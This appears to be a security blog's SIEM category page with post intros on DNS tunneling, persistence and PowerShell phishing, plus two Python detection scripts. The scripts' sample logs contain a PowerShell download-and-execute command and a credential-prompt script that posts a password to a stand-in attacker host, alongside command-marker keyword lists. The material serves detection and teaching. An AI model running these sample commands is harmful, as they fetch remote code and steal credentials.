Category: SIEM
-
Detecting DNS Tunneling
Intro: DNS tunneling is a threat that often operates under the radar of traditional defenses. By leveraging the Domain Name System (DNS), a fundamental protocol of the internet, this technique allows threat actors to exfiltrate data or establish command and control (C2) channels, often leaving IT security teams none the wiser. What is DNS Tunneling? DNS […]
-
Registry Run Keys: Maintaining Persistence
Intro: Want to start Outlook on login? Easy. Start malware on login…even in safe mode? Just as easy. Registry Run keys in Windows start programs, scripts, or commands when the computer boots or a user logs in. They make managing apps and services easier when it comes to IT management or enhancing the […]
-
Scheduled Tasks: Collecting Evidence
Intro: Scheduled tasks are a valuable Windows feature that lets users schedule specific actions on their systems at desired times: start designated programs at login, reboot the computer on a set schedule, and execute custom commands or scripts. However, adversaries can also exploit this feature to […]
-
Abusing DNS: Hiding Commands in TXT Records
Intro: While DNS TXT (text) records have legitimate purposes, it is important to be aware that adversaries can exploit TXT records to hide content and commands. Adversaries may use DNS to communicate with systems under their control within a victim network, all while appearing as normal, expected traffic. What […]
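The two DNS posts above (detecting tunneling, and commands hidden in TXT records) both come down to heuristics over DNS logs. The Python below is an added example written for this page, not code from either post: it runs two detections over a constructed DNS query log. The first groups queries by base domain and flags domains that receive many unique, long, high-entropy leftmost labels (the signature of data being carried in query names); the second flags TXT answers that are base64-encoded and decode to text containing command-like tokens. The log line format, the thresholds, the "last two labels" approximation of a base domain (a real deployment would use a public-suffix list), and the attacker-example.net domain are all assumptions made for the example.

```python
"""Two DNS-log detections: tunneling-style queries and command payloads in TXT answers."""
import base64
import math
import re
from collections import defaultdict

# Constructed sample log (not from any real environment). Assumed format per line:
# "<client_ip> <query_type> <query_name> <answer>"
PAYLOAD_CMD = ("powershell -nop -w hidden -c IEX(New-Object Net.WebClient)"
               ".DownloadString('http://attacker-example.net/a')")
PAYLOAD_B64 = base64.b64encode(PAYLOAD_CMD.encode()).decode()

SAMPLE_DNS_LOG = f"""\
10.0.0.5 A www.example.com 93.184.216.34
10.0.0.5 A cdn.example.com 93.184.216.35
10.0.0.9 TXT _dmarc.example.com v=DMARC1;p=reject
10.0.0.7 A k3n7q9xw2mvb8ztr5pyl4dch6fgj0sa1.tun.attacker-example.net 127.0.0.1
10.0.0.7 A wq2h8zf5km1pd7vt3nx9by4gc6lrs0ja.tun.attacker-example.net 127.0.0.2
10.0.0.7 A r9tb3xn1zq7mk5vw2pl8dy4hc0fg6sja.tun.attacker-example.net 127.0.0.3
10.0.0.7 A m4vz8qk2xw7nt1pb9rl3dy5hc6gf0sja.tun.attacker-example.net 127.0.0.4
10.0.0.7 TXT c2.attacker-example.net {PAYLOAD_B64}
"""

# Tokens that make a decoded TXT payload look like a command (assumed list).
COMMAND_MARKERS = ("powershell", "cmd.exe", "iex", "invoke-", "downloadstring",
                   "http://", "https://", "/bin/sh", "bash -c")
# Well-known legitimate TXT prefixes to skip (assumed allow-list).
LEGIT_TXT_PREFIXES = ("v=spf1", "v=dmarc1", "google-site-verification=", "ms=")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random-looking labels score high."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text: str):
    records = []
    for line in text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) != 4:
            continue  # skip malformed lines rather than crash the pipeline
        client, qtype, qname, answer = parts
        records.append({"client": client, "qtype": qtype.upper(),
                        "qname": qname.lower().rstrip("."), "answer": answer})
    return records


def base_domain(qname: str) -> str:
    # Assumption: the last two labels are the registered domain.
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def detect_tunneling(records, min_unique=4, min_label_len=24, min_entropy=3.0):
    """Flag base domains that receive many unique, long, high-entropy labels."""
    per_domain = defaultdict(set)
    for r in records:
        d = base_domain(r["qname"])
        sub = r["qname"][:-len(d) - 1] if r["qname"] != d else ""
        if sub:
            per_domain[d].add(sub)
    hits = {}
    for d, subs in per_domain.items():
        if len(subs) < min_unique:
            continue
        labels = [s.split(".")[0] for s in subs]  # leftmost label carries the payload
        avg_len = sum(len(l) for l in labels) / len(labels)
        avg_ent = sum(shannon_entropy(l) for l in labels) / len(labels)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            hits[d] = {"unique_subdomains": len(subs),
                       "avg_label_len": round(avg_len, 1),
                       "avg_entropy": round(avg_ent, 2)}
    return hits


def decode_if_base64(s: str):
    """Return the decoded text if s is valid base64 of printable ASCII, else None."""
    if len(s) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def detect_txt_commands(records):
    """Flag TXT answers whose (decoded) content looks like a command."""
    hits = []
    for r in records:
        if r["qtype"] != "TXT" or r["answer"].lower().startswith(LEGIT_TXT_PREFIXES):
            continue
        decoded = decode_if_base64(r["answer"])
        text = (decoded if decoded is not None else r["answer"]).lower()
        if any(m in text for m in COMMAND_MARKERS):
            hits.append({"client": r["client"], "qname": r["qname"],
                         "decoded": decoded is not None, "preview": text[:60]})
    return hits


def analyze(log_text: str):
    records = parse_log(log_text)
    return {"tunneling": detect_tunneling(records), "txt_commands": detect_txt_commands(records)}


if __name__ == "__main__":
    for kind, result in analyze(SAMPLE_DNS_LOG).items():
        print(kind, result)
```

Both detections are deliberately noisy on their own; in a SIEM they are usually scoped to internal resolvers, tuned per domain (CDNs and anti-virus vendors legitimately use long, unique labels), and correlated with query volume per client before they page anyone.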
-
PowerShell Phishing: How Adversaries Use the Command Line to Steal Your Credentials
Intro: In addition to the well-known email-based phishing attacks in which attackers impersonate legitimate websites to deceive users into revealing their login credentials, attackers can employ other methods to trick users into giving away sensitive information. It is possible to deceive users on an internal network by engaging them with a prompt that will coerce […]
-
Hunting Indirect Command Execution Using FTP
Intro: Ftp.exe can be used to start arbitrary processes and commands. Indirect command execution is a technique adversaries use to run arbitrary commands through a trusted system binary or application. Adversaries use it to evade security controls and conceal their actions, making malicious activity harder for defenders to detect and prevent. Did you […]
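The four Windows posts above (Registry Run keys, scheduled tasks, PowerShell credential prompts, and ftp.exe indirect command execution) all reduce to rules over endpoint telemetry, so one added example serves them all. The Python below is written for this page and is not code from any of the posts: it defines four small rules and runs them over a constructed list of events shaped like Sysmon Event ID 13 (registry value set), Sysmon Event ID 1 (process creation) and PowerShell Event ID 4104 (script block logging). The field names follow those event types; the user-writable-path filter on Run key writes, the `-s:` script-file check for ftp.exe, the command-line samples, and the "alice" user and attacker-example.net host are assumptions made for the example.

```python
"""Four endpoint detections over constructed Sysmon / PowerShell events (added example)."""
import re

# Constructed events (not from any real host). Keys mirror Sysmon and PowerShell log fields.
SAMPLE_EVENTS = [
    # Sysmon 13: Outlook registering itself under Run, benign.
    {"EventID": 13, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Outlook",
     "Details": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    # Sysmon 13: PowerShell writing a Run value that points into %APPDATA%.
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\alice\AppData\Roaming\upd.exe"},
    # Sysmon 1: schtasks creating a logon-triggered task for the same binary.
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /tn "Updater" /tr C:\Users\alice\AppData\Roaming\upd.exe /sc onlogon'},
    # Sysmon 1: ftp.exe driven by a script file, then spawning cmd.exe.
    {"EventID": 1, "Image": r"C:\Windows\System32\ftp.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"ftp -s:C:\Users\alice\AppData\Local\Temp\cmds.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\ftp.exe",
     "CommandLine": r"cmd.exe /c whoami"},
    # PowerShell 4104: a credential prompt whose result is posted off-host.
    {"EventID": 4104, "ScriptBlockText": "$c = Get-Credential -Message 'Outlook requires your password'; "
     "Invoke-RestMethod -Uri http://attacker-example.net/c -Method Post -Body $c.GetNetworkCredential().Password"},
    # PowerShell 4104: benign admin one-liner.
    {"EventID": 4104, "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
]

RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)\\", re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads)\\", re.I)
SCHTASKS_CREATE_RE = re.compile(r"schtasks(?:\.exe)?\s+.*?/create\b", re.I)
CRED_PROMPT_RE = re.compile(r"Get-Credential|PromptForCredential|CredUIPromptForCredentials", re.I)


def rule_run_key_persistence(ev):
    """Run/RunOnce value written, and it launches something from a user-writable path."""
    if ev.get("EventID") != 13 or not RUN_KEY_RE.search(ev.get("TargetObject", "")):
        return None
    if USER_WRITABLE_RE.search(ev.get("Details", "")):
        return f"{ev['TargetObject']} -> {ev['Details']} (written by {ev.get('Image', '?')})"
    return None  # autostart entries for installed software are expected


def rule_scheduled_task_created(ev):
    """schtasks /create on the command line (pair with Security 4698 where available)."""
    cl = ev.get("CommandLine", "")
    if ev.get("EventID") == 1 and SCHTASKS_CREATE_RE.search(cl):
        return cl
    return None


def rule_ftp_indirect_exec(ev):
    """ftp.exe spawning a child, or ftp.exe fed a script file with -s: (where '!' lines run commands)."""
    if ev.get("EventID") != 1:
        return None
    image, parent = ev.get("Image", "").lower(), ev.get("ParentImage", "").lower()
    cl = ev.get("CommandLine", "")
    if parent.endswith("\\ftp.exe"):
        return f"child of ftp.exe: {cl}"
    if image.endswith("\\ftp.exe") and re.search(r"\s-s:", cl, re.I):
        return f"ftp.exe with script file: {cl}"
    return None


def rule_credential_prompt(ev):
    """Script block that raises an interactive credential prompt."""
    sb = ev.get("ScriptBlockText", "")
    if ev.get("EventID") == 4104 and CRED_PROMPT_RE.search(sb):
        return sb[:80]
    return None


RULES = {
    "registry_run_key_persistence": rule_run_key_persistence,
    "scheduled_task_created": rule_scheduled_task_created,
    "ftp_indirect_command_execution": rule_ftp_indirect_exec,
    "powershell_credential_prompt": rule_credential_prompt,
}


def run_rules(events, rules=RULES):
    """Return (rule_name, detail) for every event/rule pair that fires."""
    alerts = []
    for ev in events:
        for name, rule in rules.items():
            detail = rule(ev)
            if detail:
                alerts.append((name, detail))
    return alerts


if __name__ == "__main__":
    for name, detail in run_rules(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The Run key rule only fires when the autostart target lives in a user-writable directory; that single filter removes most installer noise while still catching the `%APPDATA%` case in the sample. The ftp.exe rule fires twice on the sample on purpose: once on the `-s:` invocation and once on the child process, so an analyst sees both the cause and the effect.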